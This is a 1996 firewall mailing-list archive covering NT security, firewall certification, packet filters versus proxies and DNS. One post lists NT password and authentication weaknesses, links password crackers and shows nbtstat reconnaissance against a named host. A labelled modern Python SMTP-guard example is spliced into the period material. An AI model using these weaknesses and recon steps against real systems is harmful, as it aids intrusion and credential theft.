Canada, K2L 1M1              Email: bjm@ottawa.net
========================================================

From firewalls-owner Mon Jul 1 12:15:15 1996
From: peter@baileynm.com (Peter da Silva)
To: Russ.Cooper@RC.Toronto.on.ca (Russ)
Cc: johnb@aztec.co.za, firewalls@GreatCircle.COM
Subject: Re: NT Backoffice "Catapult" firewall certified?
Date: Mon, 1 Jul 1996 12:31:16 -0500 (CDT)
In-Reply-To: <01BB66C2.56E11220@rwcooper.rc.toronto.on.ca> from "Russ" at Jun 30, 96 08:25:47 pm

> I've been securing Windows NT for almost 5 years now, and while there are
> some environments which I admit are almost impossible to properly secure
> (access to NT through WinDD, Citrix, or some other terminal-emulation-like
> server-based environment...thanks to Pete Da Silva)

Or any other situation where more than one user shares an NT workstation, including kiosk type access to general applications (such as a public print shop, computer lab, hotelling, ...), so it's not really fair to simply dismiss this so blithely as a side effect of third party software.

NTFS is a reasonably good file system and NT provides all the hooks to make shared use of hardware as secure as it is in UNIX. The problem is that it's extremely difficult to simultaneously secure the system and actually allow users to log in and run applications, because of the way Windows software works... in fact, Microsoft is still telling application vendors to have their programs put files in system directories, and doing so themselves.

I am but secure north by northwest, when the wind is from the south I can't tell a hack from a hacksaw.
*sigh*

From firewalls-owner Mon Jul 1 12:20:14 1996
From: Ian Johnstone-Bryden
To: Corey "M." Horowitz
Cc: firewalls@GreatCircle.COM
Subject: Re: NCSA Certification
Date: Mon, 01 Jul 96 19:38:43 GMT

> At 08:34 AM 7/1/96, gary flynn wrote:
> >> I think some important questions need to be asked:
> >>
> >> 1. Who appointed the NCSA as the proper body to approve firewalls?
> >>
> >
> >I think your questions are valid but I think the underlying
> >principle is "lead, follow, or get the hell out of the way" :-)
>
> Corey responded in part:
>
> I think you're all missing the point. I have no problem with the concept
> of the NCSA or any other responsible body acting as a protector of the
> public interest in insuring that all firewall products deliver the security
> promised or, at a minimum, necessary to adequately protect our networks.
> The mission statement is admirable. The execution is faulty.

I think the real point is that a load of small groups are trying to establish themselves as certification authorities on security. There are also the national and international initiatives backed by governments. OK, US NCSC may have been too restricted in the past. ITSEC addressed most of the major issues, and we are all supposed to be backing Common Criteria. None of those schemes are perfect, but one of the reasons for that is that vendors and users outside government have been very slow to join the party. That's meant that criteria have been driven by academics and government officials and they don't have a really good understanding of what drives commercial enterprises. Rather than sulk off and try to set up many competitive partial schemes, it would be more productive to participate in the major schemes which are well established and try to improve them. I personally have a few reservations about Common Criteria, but it does offer the prospect of a true international criteria, it's based on ITSEC, which was in turn an improvement based on TCSEC, and is well worth actively supporting and changing from within.

WRT the nasty commercial issues, no one does anything for free. TCSEC certifications cost money, ITSEC requires the vendor to pay for evaluation time at commercial rates, Common Criteria won't be for free. The major differences between NCSA certification and say ITSEC are:

1. NCSA are charging a membership fee which is less than 25% of what it would cost for an ITSEC evaluation of a firewall at E2 or E3. If NCSA prove to do as good as or better evaluation job then they have commercial advantage. Probability though is that their evaluation will be trivial by comparison - if not they are sure to say so on this forum.

2. ITSEC is open (and has been since 1990) to anyone who wants to submit a product and pay for the evaluation. You don't have to be a member of the club. Also the criteria is public domain and the evaluators and certifiers are not only independent of the vendor, but of each other - you can't get much more equal than that.

3. National and international legislation will be based on ITSEC and CC rather than on trade groups like NCSA.

Ian J-B.
From firewalls-owner Mon Jul 1 12:24:29 1996
From: Russ
To: "'Peter da Silva'"
Cc: "johnb@aztec.co.za"
Subject: RE: NT Backoffice "Catapult" firewall certified?
Date: Mon, 1 Jul 1996 14:29:19 -0400

I didn't make it clear in my message, but I was referring to securing an NT Server, not an NT Workstation.

"Or any other situation where more than one user shares an NT workstation, including kiosk type access to general applications (such as a public print shop, computer lab, hotelling, ...), so it's not really fair to simply dismiss this so blithely as a side effect of third party software."

First of all, the issue was raised about the ability to secure an NT Server for Internet use as a Firewall. This situation is definitely not one where we are talking about multiple users sharing the machine for access to general applications. In an attempt to show that NT is *not* all things to all men, I used an example that certain configurations of an NT server are virtually impossible to secure. This was not an attempt to isolate a single third party vendor, but merely a statement of fact with which I am personally familiar. The fact that many *existing* Windows-based applications cannot be properly secured on an NT box that is going to be logged into locally by multiple users is a valid extension of my example.

Securing an NT box for multiple users locally (i.e. not network access but actually sitting down in front of the box and using its keyboard, or, in the case of Citrix-like applications, doing so through remote emulation), can be very complex and in some cases impossible. It all depends on the applications that *must* run on the box. Almost all *NT-specific* user applications comply with the profile model and can be installed appropriately. Arcada's Backup Exec is one good example.

I don't think I am blithely dismissing anything. If your workstations are running server-based installations of Office, you can secure them properly. Word, Excel, etc. can all be installed on a shared machine running from a server such that they are secure enough to prevent attacks, even Trojans. This presumes that the clients are NT as well, in which case application profiles can be secured by individual user ID. Write access is not necessary to their shared components once the application has been installed. The need to maintain write access to a shared component is not mandated by NT, but by the application. There is a big difference between a network installation of Office and a local installation. Remember, also, that there is an NT-specific version of Word and Excel which do properly understand profiles.

So, you're right Pete, but...;-]

Cheers,
Russ

From firewalls-owner Mon Jul 1 12:25:05 1996
From: gary flynn
To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM
Cc: CMH@Interramp.com, gary@habanero.jmu.ed
Subject: Re: NCSA Certification
Date: Mon, 1 Jul 1996 14:57:48 -0400

> then NCSA, if it is a 501-C tax-exempt US trade association, may be in a
> world of trouble with respect to US anti-trust laws. Gary Flynn and his
                                                       ^^^^^^^^^^
> company might get a better ROI if, instead of joining NCSA and whining in
> this forum about their certification program, they spent the same kind of

Just to set the record straight, my response to SOMEONE ELSE's concerns (I won't say whines) about the certification process was that I saw it as a "lead, follow, or get out of the way" decision. I won't say "whine" because if I had a company that developed firewall products I think I'd be justifiably concerned along the same lines as the original poster's questions.

Gary Flynn
Network Manager
James Madison University

From firewalls-owner Mon Jul 1 12:41:23 1996
From: Charles Ragan
To: "Russell L. Jones"
Cc: "'firewalls@GreatCircle.COM'"
Subject: Re: Cisco Router security
Date: Mon, 01 Jul 1996 13:20:06 -0500

You can read about it below;
http://www.cisco.com/warp/customer/707/2.html

Charles

At 12:38 PM 7/1/96 -0400, Russell L. Jones wrote:
>What are the known bugs which leave Cisco routers running the 10.X version of the management software vulnerable to IP based attacks?
>
>Russell L. Jones

______________________________________________________________
Charles Ragan, Jr.
International Network Services
CCIE #1764, MCSE, MCNE, CBE
Pager - 1-800-INS-1-INS
Using NT Server 4.0 Beta2 & Eudora 2.2(32)
______________________________________________________________

From firewalls-owner Mon Jul 1 13:29:57 1996
From: Ryan.Russell/SYBASE
To: Peter da Silva
Cc: Mike Shaver, avalon
Subject: Re: Stateful Packet Screens
Date: 1 Jul 96 13:13:23 EDT

I would not disagree that ALGs would probably allow one to more easily filter stuff in the datastream (i.e. yank out stuff between the tags.) This is because, by their nature, many of them store a significant portion of the document on its way through, and hence, would make it easier to run through some script on the proxy server. This would also be why they would tend to be slower. Please correct me if I'm wrong, I'm no proxy expert. I've only used CERN and Socks proxies. And I didn't administer them. I suppose the upshot would be that web proxies could cache today's Dilbert if you wanted. I agree that you could probably do the same with the SPFs on the market today, but I wouldn't want to try.

I'm not sure about the security point.... If your assumption is that being able to parse datastreams makes for better security, I suppose that could be correct. I think it might be a difference of opinion though.. as I've mentioned on the list before, I am not about to attempt to catch viruses and evil applets on their way in through the firewall. I think that is a losing battle. I would rather have good antivirus and a fixed Netscape on the host on the inside.

I definitely disagree on the administrative convenience point. I have/had a socks proxy, and having a transparent SPF is MUCH easier for me. Granted, it was Socks 4, but even so. I suspect that one will have a much easier time allowing a new type of service on a SPF than an AG. The SPF I have (FW1) will automatically allow some new service out of the box, if the network transaction is simple enough (i.e. a simple TCP transaction.) That may or may not be a good thing. I prefer to let my users access as many toys as will work through the firewall. I'll let you know if I change my mind when we use up our bandwidth.

Are there proxies that are as transparent as something like FW1? If not, how can you say that having to set proxy entries on all your inside hosts on a per-app basis is administratively easier?

Ryan

---------- Previous Message ----------
To: shaver
cc: avalon, chris, Firewalls
From: peter @ baileynm.com (Peter da Silva) @ smtp
Date: 07/01/96 08:37:28 AM
Subject: Re: Stateful Packet Screens

> As Darren pointed out, it's possible to do everything an AG does with
> an SPS, and vice versa.

However, in practical terms, you can't get a stateful packet filter that will do all the stuff even the simplest application level gateways do as a matter of course, and for a simple configuration it's much easier to get the existing ALGs configured right than the existing SPFs. In theory, you and Darren are correct. In practice, existing implementations do fall into clumps with user convenience and performance being highest for packet filters, and administrative convenience and security being highest for proxies.

From firewalls-owner Mon Jul 1 15:36:45 1996
From: ericj@breakers.East.Sun.COM (Eric Johnson)
To: firewalls@greatcircle.com
Subject: ftp PASV risks?
Date: Mon, 1 Jul 1996 17:52:23 -0400

All,

Can someone tell me what security risks are associated with allowing PASV ftp? I've got a few ideas, but I'd like to hear from the experts. Please send mail to me directly, as well as to the list. (I didn't mail my check to SiCk PuPpY promptly, so my subscription has lapsed.)
Thanks in advance,
Eric

From firewalls-owner Mon Jul 1 15:48:58 1996
From: Ryan.Russell/SYBASE
To: Peter da Silva
Cc: firewalls
Subject: Re: Stateful Packet Screens
Date: 1 Jul 96 14:48:37 EDT

Why "low security" end of the spectrum? Because SPF tends to support more app types? I don't believe restricting the kind of data that users can access is a reasonable form of security. Besides, they will always find a way around it. Do you think that proxies that support essentially Telnet, FTP, and HTTP are more secure than other solutions that support more? In theory, yes, less data attacks to worry about.. in practice, all the interesting data attacks are coming through HTTP anyway. And, it's quite easy for me to deny a particular service should I choose to. Just as easy as it would be on a proxy, I would expect.

What kind of proxy do you use? Why couldn't a proxy be transparent?

Is anyone out there doing anything with, say a web proxy, besides just passing the HTML document through? Is anyone getting any value while taking the speed hit and having to configure your clients special?

Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: firewalls
From: peter @ baileynm.com (Peter da Silva) @ smtp
Date: 07/01/96 03:53:06 PM
Subject: Re: Stateful Packet Screens

> I definitely disagree on the administrative convenience point. I have/had
> a socks proxy, and having a transparent SPF is MUCH easier for me.

That depends on what your security policy is. If it's "allow anything if it's initiated on the inside" then a packet filter is definitely easier than SOCKS. But then you're tending towards the "low security" end of the spectrum to begin with.

> Are there proxies that are as transparent as something like FW1?

If there are, they're not doing anything more than a packet filter.

From firewalls-owner Mon Jul 1 16:04:05 1996
From: Bill Stout
To: dnewman@mcgraw-hill.com
Cc: Firewalls@GreatCircle.COM
Subject: Re: NT security--Bill Stout's list
Date: Mon, 1 Jul 1996 15:31:30 -0700

At 09:09 AM 7/1/96 edt, dnewman@mcgraw-hill.com wrote:
>
>Russ Cooper writes:
>
>>> "Because NT has even more security holes than Irix *duck*, I wont list
>>> them here,"
>
>>It's interesting that you should say this.
>>Bill Stout put a very good list
>>together, but a number of those issues can be addressed. . .
>
> Russ, can you please post a URL for this list? TIA.
>
> Regards
> David Newman

The following is a small list of 'concerns' I had posted to 'NT security' in administering my own domain, with additional comments. Hackers already know these, so protect your systems:

Is it possible to hack a connect onto a NT fileservice from the network? There _must_ be holes:

1. I know DOS and Linux have drivers which allow you to RWED files on an NTFS disk, if the disk is in the same machine.

Comment: Some have stated only read is possible with the NTFSDOS.EXE driver. I heard that a write-capable driver does exist, and if not, making a write-capable driver is trivial once you can read the disk. Either way you can read the registry and files, then run crack.

2. I accidentally had full access to all files once on an NT 3.51 server w/service pack 3, when I first started up NT 4.0b1 client on my network. Using any account I accessed all protected files and directories. I even double-checked permissions to see if I was really browsing directories that only had user privileges. I haven't had time to duplicate it, but quickly fixed the problem (applied SP4) after I picked my jaw off the floor!

Comment: I would appreciate it if someone with NT3.51 SVR sp3 could load NT4.0 WS (b1/b2?) to see if this happens, and e-mail me.

3. NT Workstations having the wrong challenge response can have a user login using cached data with the network cable disconnected (bypassing 'netlogon' service). When the cable is reconnected, all services (and network files) are available. I found this after someone installed a duplicate domain, the clients authenticated on the wrong domain, and wouldn't connect on the correct one, except for a disconnect-logon-reconnect process.

Comment: This is like bypassing NIS+ by unplugging the cable/Internet for a second.
The CIFS/1.0 draft RFC by MS has some interesting comments about passwords in section "8.3 LANMAN 2.1 (and earlier) Challenge/Response", and in the sections that follow. See:
ftp://ietf.cnri.reston.va.us/internet-drafts/draft-heizer-cifs-v1-spec-00.txt

4. NT MSV1.0 encrypts user password in RSA MD-4, but compromises the password by also encrypting the password in Lan Manager DES compatible mode. Then transmits the same password in both encrypted formats. For Lan Manager compatibility, of course.

Comment: NT uses only RSA MD-4 when the password is longer than 14 characters. None of the existing NT user interfaces allow > 14 characters. The password is encrypted and exchanged as a 16-byte data string, which is compared to the encrypted string in the SAM database. This being a constant can be captured and reused.

NT password crackers:
ScanNT - http://www.omna.com/yes/andybaron/scannt.htm
Kane also cracks NT - http://www.intrusion.com/ksant.htm (Very good security reports on NT users/permissions/integrity)
I think both need to run on NT, and target a host or domain.

5. NT Server accepts connections without domain entries (WFW compatibility), and passwords in DES vs. RSA encryption (Lan Manager compatibility); security is compromised by the lowest common denominator: WFW and Lan Manager compatibility.

Comment: Ref: http://www.microsoft.com/kb/bussys/winnt/q102716.htm

Also, browse your systems' registry (95/NT) from a remote webserver:
http://dev1.ora.com/andcgi/wregcgi.exe
This one might make you want to unplug your Internet feed!
If you know of a webserver running NT, try this from in front of your firewall, using 95 or NT:

C:\> nbtstat -A 198.105.232.1     #(ftp.microsoft.com)

       NetBIOS Remote Machine Name Table

   Name                Type         Status
---------------------------------------------
   FTP            <00>  UNIQUE      Registered
   INETSERVERS    <00>  GROUP       Registered
   FTP            <20>  UNIQUE      Registered
   INETSERVERS    <1C>  GROUP       Registered
   FTP            <03>  UNIQUE      Registered
   INETSERVERS    <1E>  GROUP       Registered
   _SERVICE       <03>  UNIQUE      Registered
   INet~Services  <1C>  GROUP       Registered
   IS~FTP.........<00>  UNIQUE      Registered
   FTP            <01>  UNIQUE      Registered

   MAC Address = 08-00-2B-A3-77-EC

Just like finger, but better.

--!> I would appreciate someone setting me straight on these. For example, if there were a way to turn off Lan Manager compatibility (DES) and accept only RSA passwords, I would appreciate it. Also, it would be nice to enforce domain entries in the connection string (I only run NT Clients). I suppose I could also remove the floppies from the servers, since I load all software with CDs. Since C2 certification was granted only with network connections disabled, there must be good reason for this.

Bill Stout

<=======10========20========30========40========50========60========70========80
William B. Stout       | Major revelations:
Senior Systems Admin   | "All objects are part of a larger object."
Hitachi Data Systems   | "3 aware beings comprise a person; mind, body, spirit."
NT/UNIX/I-net/Routers  | "The secret of life: To be involved with 'creation'."
408-970-4822           | Disclaimer: I speak for no one but us three people. ;)
--------------------------------------------------------------------------------

From firewalls-owner Mon Jul 1 16:50:21 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA17014 for firewalls-outgoing; Mon, 1 Jul 1996 16:45:09 -0700 (PDT)
Received: from ihgw1.att.com (ihgw1.att.com [207.19.48.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA16991 for ; Mon, 1 Jul 1996 16:44:59 -0700 (PDT)
From: rls@neptune.att.com
Received: by ihig1.att.att.com (SMI-8.6/EMS-1.2 sol2)
Original-From: neptune!rls
Message-Id: <199607012344.SAA29664@ihig1.att.att.com>
Subject: Re: How good is "stateful inspection"? (fwd)
To: michael@memra.com (Michael Dillon)
Date: Mon, 1 Jul 1996 19:18:10 -0400 (EDT)
Original-From: Ronald L. Sharp
Cc: firewalls@greatcircle.com
In-Reply-To: from "Michael Dillon" at Jun 30, 96 03:16:43 pm
X-Mailer: ELM [version 2.4 PL17]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Michael, you win the prize. This is exactly what I was speaking about. Most answers were concerned about the proxy knowing the buffer sizes of the internal hosts. However, what I have seen from my limited breadth of experience with proxies across platforms is that there are common buffer sizes for protocol elements. This is either by standard or by convention. Like much of Unix, network apps such as finger have common roots and so they may have the common buffer sizes. The discussion now can get down to "no they don't" and "yes they do" but I would rather not. I was just bringing up one example of a possible natural protection provided by proxies that you may not find in an SPF. By their nature proxies actually parse and process the protocol data (to some extent) and this may cause some attacks to be stopped by the proxy.

For those who said they feel this is more an end host problem: I am a strong advocate for security in depth and I say provide levels of security wherever you can.
Thanks to everyone who participated in this discussion. If there are examples of other natural protections offered by proxies I would be interested to hear of them.

>
> On Sun, 30 Jun 1996, Darren Reed wrote:
>
> > > The person who posted the question was under the impression that SPF couldn't
> > > but proxies could. I believe that neither can effectively protect from that
> > > type of attack,
> > > because it requires very specific knowledge about the platform in question on
> > > the
> > > inside.
> >
> > But, in both cases, you must somehow put the knowledge about what is good
> > and bad in the proxy/filter code.
> >
>
> It doesn't require any knowledge about the interior platforms which it is
> attempting to protect.
>
> All of this discussion about buffer overruns seems to be skirting the
> issue.
>
> A. many protocols have defined maximum lengths for various fields
> transferred within those protocols.
>
> B. Often implementors of a protocol inadvertently expose their products to
> misuse by not checking those maximums.
>
> C. Often hackers break into servers by means of exploiting a buffer
> overrun in a flawed server application.
>
> D. There is no technical reason why a firewall proxy could not examine
> the data flowing through it and ensure that all fields are within the
> maximums defined for the protocol by truncating the field and logging
> the event.
>
> E. I don't know enough about stateful packet filters but they may be able
> to do the same as proxies.
>
> F. If we assume that the applications server has been proven to operate
> correctly within the protocol specification by running some sort of
> test suite (a rather common occurrence these days) then the proxy would
> provide a greatly reduced level of risk by preventing these buffer
> overrun attacks.
>
> G.
> Nothing is perfect, the solution I propose is certainly not perfect,
> but I think it moves in the right direction and does not increase
> any security risks or negatively impact the operation of the firewalls
> or the applications.
>
>
> Michael Dillon                   ISP & Internet Consulting
> Memra Software Inc.              Fax: +1-604-546-3049
> http://www.memra.com             E-mail: michael@memra.com
>
>

--
Ron Sharp
Internet address: r.l.sharp@att.com

From firewalls-owner Mon Jul 1 17:22:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA18203 for firewalls-outgoing; Mon, 1 Jul 1996 17:09:10 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA18196 for ; Mon, 1 Jul 1996 17:09:02 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3)
Message-Id: <9607020006.AA29551@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
To: firewalls
From: Ryan.Russell/SYBASE
Date: 1 Jul 96 17:07:11 EDT
Subject: Re:Stateful Packet Screens
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hmm.. I don't know about the CC line... sigh, the joys of Notes mail. Frequently the mail gets there even if it chews the header. You're not the first to complain about my mail.

Anyway, in response to your response:

Yes, I allow any app initiated from the inside. (At least, any that will work with the FW, I only occasionally go out of my way to make one work that doesn't automatically.) I don't consider this to be significantly less secure than a connection with limited allowed apps. My users are just as capable of hosing themselves with telnet/http/ftp as with any other new toy.
As I mentioned before, the users would find a way around you. At least I can log what they are up to, and go back if I find something nasty has toasted someone's machine.

I suppose the worst case (since my FW doesn't allow incoming, like just about any FW) would be that some app, likely a Web thingy, would do some trojan stuff, and initiate a connection out from the inside. A proxy would allow that just as easily.

And yes, of course I would deny based on port. There is nothing else to base a decision about service type on. Say you only allow telnet out... I do a telnet x.x.x.x 80 or 25. Am I running telnet, or am I running HTTP or SMTP?

Do you have a proxy firewall in place? Do you have users? Don't they complain about not being able to use Realaudio?

Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc:
From: peter @ baileynm.com (Peter da Silva) @ smtp
Date: 07/01/96 06:03:22 PM
Subject: Re: Stateful Packet Screens

> To: Peter da Silva
> Cc: firewalls
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Are your messages getting to the list? I'll just reply to you.

> Why "low security" end of the spectrum? Because SPF
> tends to support more app types? I don't believe
> restricting the kind of data that users can access is a
> reasonable form of security.

I call letting any application through by default without evaluating it for security "low security". And with a stateful packet filter, I don't see how you can do anything else without a lot of very complex rules.

> And, it's quite easy for me to deny a particular
> service should I choose to.

OK, how would you set up a default-off environment with a stateful packet filter, based on protocols (and bearing in mind that destination port isn't really adequate, since a bandit application could listen to any port)?
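Two of the points made above fit together in code: Michael Dillon's point D (quoted in Ron Sharp's message) that a proxy can check every field against the protocol's defined maximum, truncate it and log the event, and Peter da Silva's closing point that the destination port alone cannot tell you which protocol is inside a connection. The following is an added example, not code from anyone in the thread: a proxy-side guard for the SMTP command channel that first checks that the bytes are SMTP at all before forwarding, then clamps the command line, path, local-part and domain to the maxima RFC 821 section 4.5.3 lists. The sample session is constructed; the `strict` mode is my addition, since a truncated mailbox is a different mailbox and a site may prefer rejection for address fields.

```python
"""Protocol-aware field clamping for an SMTP command channel.

Added example in the spirit of Michael Dillon's point D; limits are the ones
RFC 821 section 4.5.3 lists, the sample session below is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Maximum sizes RFC 821 section 4.5.3 requires implementations to handle.
SMTP_LIMITS: Dict[str, int] = {
    "command_line": 512,   # including CRLF
    "path": 256,           # the whole <reverse-path> / <forward-path>
    "local_part": 64,      # mailbox name before the last '@'
    "domain": 64,
}

# Verbs this guard recognises; anything else on the channel is not SMTP.
SMTP_VERBS = {b"HELO", b"EHLO", b"MAIL", b"RCPT", b"DATA", b"RSET",
              b"NOOP", b"QUIT", b"VRFY", b"EXPN", b"HELP", b"TURN"}

_PATH_CMD = re.compile(rb"^(MAIL FROM|RCPT TO):\s*<([^>]*)>\s*$", re.IGNORECASE)


@dataclass
class GuardResult:
    forwarded: Optional[bytes]                          # None: line was dropped
    events: List[str] = field(default_factory=list)     # what the proxy logs


def _clamp(value: bytes, name: str, limit: int, events: List[str]) -> bytes:
    """Truncate a field to its maximum and record the event (Dillon's point D)."""
    if len(value) <= limit:
        return value
    events.append(f"{name}: {len(value)} bytes > {limit}, truncated")
    return value[:limit]


def guard_smtp_line(line: bytes, limits: Dict[str, int] = SMTP_LIMITS,
                    strict: bool = False) -> GuardResult:
    """Decide what to forward for one client line of an SMTP session.

    The decision is made on the bytes, not on the TCP port, so an HTTP request
    arriving on port 25 is dropped rather than passed on.  With strict=True any
    line that needed clamping is dropped instead of forwarded truncated.
    """
    res = GuardResult(forwarded=None)
    body = line.rstrip(b"\r\n")
    # The whole command line first: over-long lines are the classic overrun
    # vector, so they are clamped before anything tries to parse them.
    body = _clamp(body, "command line", limits["command_line"] - 2, res.events)
    verb = body.split(b" ", 1)[0].upper()
    if verb not in SMTP_VERBS:
        res.events.append(f"not SMTP ({body[:16]!r}): dropped")
        return res
    m = _PATH_CMD.match(body)
    if m:
        cmd, path = m.group(1), m.group(2)
        path = _clamp(path, "path", limits["path"], res.events)
        if b"@" in path:
            local, domain = path.rsplit(b"@", 1)
            local = _clamp(local, "local-part", limits["local_part"], res.events)
            domain = _clamp(domain, "domain", limits["domain"], res.events)
            path = local + b"@" + domain
        body = cmd + b":<" + path + b">"
    if strict and res.events:
        res.events.append("strict mode: line dropped after clamping")
        return res
    res.forwarded = body + b"\r\n"
    return res


def guard_session(lines: List[bytes]) -> Tuple[List[bytes], List[str]]:
    """Run every line of a session through the guard; return (forwarded, log)."""
    forwarded, log = [], []
    for ln in lines:
        r = guard_smtp_line(ln)
        if r.forwarded is not None:
            forwarded.append(r.forwarded)
        log.extend(r.events)
    return forwarded, log


# Constructed sample session: a 600-byte HELO, a clean command, an oversized
# local-part, and an HTTP request that has no business on this channel.
SAMPLE_SESSION = [
    b"HELO " + b"x" * 600 + b"\r\n",
    b"MAIL FROM:<bob@example.com>\r\n",
    b"RCPT TO:<" + b"a" * 100 + b"@example.com>\r\n",
    b"GET / HTTP/1.0\r\n",
]

if __name__ == "__main__":
    out, log = guard_session(SAMPLE_SESSION)
    for ln in out:
        print("FWD", ln[:48], "..." if len(ln) > 48 else "")
    for ev in log:
        print("LOG", ev)
```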
From firewalls-owner Mon Jul 1 17:53:21 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA21912 for firewalls-outgoing; Mon, 1 Jul 1996 17:47:21 -0700 (PDT)
Received: from po.dbs.com.sg ([203.120.44.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA21903 for ; Mon, 1 Jul 1996 17:47:14 -0700 (PDT)
Received: from dbs.com.sg by po.dbs.com.sg (SMI-8.6/SMI-SVR4)
Received: from T1#u#DM1-Message_Server by dbs.com.sg
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Tue, 02 Jul 1996 08:32:52 +0800
From: Chin Cheng Baey
To: firewalls@GreatCircle.COM
Subject: SENDING BIG FILES THRU INTERNET
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

1. Am not sure whether this question should be posted to this group. If I'm wrong, my apologies for taking up your bandwidth. Hope someone can point me in the right direction.

2. I'm toying with the idea of sending encrypted files (probably DES or DES-derivative type encryption or maybe even RSA) thru the Internet to counterparts overseas. The size of the files may hit 4-5 mb.

3. Noticed that when big files are sent thru the Internet, it gets chopped up into smaller parts. Am not sure whether this is done by the sender or the Internet provider. For encrypted files, this may pose a problem because the recipient may not be able to assemble the files back for decryption.

4. Would be grateful if someone could advise whether my concerns are valid. Are there any ways to get around the problem?

5. Many thanks in advance for all your kind advice.
From firewalls-owner Mon Jul 1 18:52:39 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA25354 for firewalls-outgoing; Mon, 1 Jul 1996 18:25:06 -0700 (PDT)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id SAA25346 for firewalls@greatcircle.com; Mon, 1 Jul 1996 18:25:02 -0700 (PDT)
Received: from gate.ggr.co.uk (gate.ggr.co.uk [193.128.25.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA06185 for ; Mon, 1 Jul 1996 04:06:03 -0700 (PDT)
Received: from mailhub.ggr.co.uk (uk0x07.ggr.co.uk [147.184.146.69]) by gate.ggr.co.uk; Mon, 1 Jul 1996 12:01:32 +0100 (BST)
Received: from ukwit01.ggr.co.uk (ukwit01.ggr.co.uk [147.184.219.175]) by mailhub.ggr.co.uk; Mon, 1 Jul 1996 11:54:27 +0100 (BST)
Received: by ukwit01.ggr.co.uk (8.7.5/imd160294)
From: "Lack Mr G M"
Message-Id: <9607011204.ZM4779@ukwit01>
Date: Mon, 1 Jul 1996 12:04:17 +0100
In-Reply-To: Dan Shadix
References: <01BB645B.80CF6E60@gccs25.gccs.cpf.navy.mil>
X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail)
To: Dan Shadix
Subject: Re: split-brain DNS
Cc: "'Firewalls@GreatCircle.COM'"
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Why can't you make the one master DNS server secondary for all your internal sub-domains? Then if a request is for a domain for which it is authoritative, it will just respond, if not then it will go to the Internet at large.

Whereas this might work (ie. it sounds as though it will, but I haven't thought it through completely) this would leave me with the master server being authoritative for everything. This would push the size of its database up from ca. 8000 to ca. 40000 entries (guessing here, but of that order). I don't have the memory on the servers for such numbers. Also, it strikes me as being against the "spirit" of DNS.
Relatively few queries go "between" domains, so I don't want this master server to spend a lot of its time doing zone queries for timestamps and frequent zone transfers just for these. I just want to send the query off to the relevant server, just as in the "full" InterNET.

A logical extension of your solution would be to get all of the root name servers to become secondaries for all domains, and I'm sure that we can agree that would be a disaster!

> Not sure that the problem described is the one I have, but there is no way
> for this to work if you have multiple private domains (ie. not just
> sub-domains). You can get all of these to forward to an internal master, but
> you can't get this master to forward the relevant queries back to the internal
> domains (as you can't "prime" the cache with non-root servers). So the
> internal master asks the real root servers about your internal domains and
> believes that they do not exist. The result is that you can't resolve one
> internal domain from another.
>
> Now, even if you do have a single domain with sub-domains it is quite likely
> that the *reverse lookup* domains are separate, so you have the problem then
> anyway.
>
> I have had to use a modified version of 4.9.3B9 which, basically, does allow
> me to prime the cache with internal name servers.

--
----------- Gordon Lack ----------------- gml4410@ggr.co.uk ------------
The contents of this message *may* reflect my personal opinion.
They are *not* intended to reflect those of my employer, or anyone else.
From firewalls-owner Mon Jul 1 18:53:07 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA27126 for firewalls-outgoing; Mon, 1 Jul 1996 18:42:15 -0700 (PDT)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id SAA27101 for ; Mon, 1 Jul 1996 18:42:05 -0700 (PDT)
Received: from explorer2.clark.net (mjr@explorer2.clark.net [168.143.0.5]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id VAA24901 for ; Mon, 1 Jul 1996 21:39:19 -0400 (EDT)
From: "Marcus J. Ranum"
Received: (from mjr@localhost) by explorer2.clark.net (8.7.1/8.7.1) id VAA27764 for Firewalls@GreatCircle.COM; Mon, 1 Jul 1996 21:39:18 -0400 (EDT)
Message-Id: <199607020139.VAA27764@explorer2.clark.net>
Subject: Re: Catapault firewall
To: Firewalls@GreatCircle.COM
Date: Mon, 1 Jul 1996 21:39:17 -0400 (EDT)
In-Reply-To: <199607011943.MAA27578@miles.greatcircle.com> from "Firewalls-Digest" at Jul 1, 96 12:43:30 pm
Reply-To: mjr@v-one.com
Organization: V-One Corporation, Baltimore, MD
Office Phone: 410-889-8569
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
